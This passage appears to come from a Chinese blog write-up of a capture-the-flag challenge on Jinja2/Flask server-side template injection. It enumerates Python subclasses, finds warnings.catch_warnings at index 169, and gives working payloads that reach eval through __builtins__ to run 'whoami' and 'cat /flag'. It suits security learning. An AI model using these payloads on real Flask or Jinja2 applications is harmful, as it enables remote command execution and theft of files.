'pprint._safe_key'", "class 'pprint.PrettyPrinter'", "class 'werkzeug.routing.RuleFactory'", "class 'werkzeug.routing.RuleTemplate'", "class 'werkzeug.routing.BaseConverter'", "class 'werkzeug.routing.Map'", "class 'werkzeug.routing.MapAdapter'", "class 'flask.signals.Namespace'", "class 'flask.signals._FakeSignal'", "class 'flask.helpers.locked_cached_property'", "class 'flask.helpers._PackageBoundObject'", "class 'flask.cli.DispatchingApp'", "class 'flask.cli.ScriptInfo'", "class 'flask.config.ConfigAttribute'", "class 'flask.ctx._AppCtxGlobals'", "class 'flask.ctx.AppContext'", "class 'flask.ctx.RequestContext'", "class 'flask.json.tag.JSONTag'", "class 'flask.json.tag.TaggedJSONSerializer'", "class 'flask.sessions.SessionInterface'", "class 'werkzeug.wrappers.json._JSONModule'", "class 'werkzeug.wrappers.json.JSONMixin'", "class 'flask.blueprints.BlueprintSetupState'", "class 'unicodedata.UCD'", "class 'jinja2.ext.Extension'", "class 'jinja2.ext._CommentFinder'"]
    for i in list4:
        print(i)

    大部分都是先查找warnings.catch_warnings模块中的OS模块

    当前warnings.catch_warnings模块在第169个(从0开始的)

    {{().__class__.__bases__[0].__subclasses__()[169].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}
    发现可以执行,构造命令
    {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}
    没有什么过滤

    注解:__import__('os').popen('whoami').read() 其实就是执行系统命令

    最后的payload

    {{''.__class__.__mro__[1].__subclasses__()[169].__init__.__globals__['__builtins__'].eval("__import__('os').popen('cat /flag').read()")}}

  • 相关阅读:
    linux:yum
    python:公共操作
    python 控制流程
    linux:lamp环境
    linux:nginx
    深圳:永安在线-安全
    linux:mysql
    linux:shell
    linux:项目上线
    linux:权限管理
  • 原文地址:https://www.cnblogs.com/zzjdbk/p/13661932.html
Copyright © 2011-2022 走看看